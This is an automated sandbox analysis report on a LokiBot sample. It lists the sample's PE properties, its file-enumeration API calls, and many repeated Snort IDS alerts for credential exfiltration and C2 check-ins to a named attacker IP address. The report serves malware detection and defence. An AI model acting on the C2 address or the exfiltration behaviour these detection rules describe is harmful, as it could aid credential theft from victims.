                Source: dhGoVvfmul.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: dhGoVvfmul.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: wntdll.pdbUGP source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

                Networking

                barindex
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:54800 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49758 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64454 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49759 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64277 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49761 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49761
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56076 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49762 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49762
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60758 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49764 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49764
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60647 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49765 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49765
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64909 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49767 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49767
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56509 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49769 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49769
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:54069 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49771 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49771
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:57594 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49777 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49777
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60512 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49778 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49778
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61361 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49779 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49779
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50445 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49780 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49780
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:51679 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49781 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49781
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:52472 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49782 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49782
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:62354 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49783 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49783
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50061 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49784 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49784
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:60612 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49785 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49785
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:58816 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49786 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49786
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56437 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49787 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49787
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:64825 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49788 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49788
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:53989 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49789 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49789
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:63431 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49790 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49790
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:56901 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49791 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49791
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50800 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49792 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49792
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:52256 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49793 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49793
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61081 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49794 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49794
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:63712 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49797 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49797
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:50778 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49798 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 88.218.168.92:80 -> 192.168.2.4:49798
                Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.4:61486 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49799 -> 88.218.168.92:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49799 -> 88.218.168.92:80
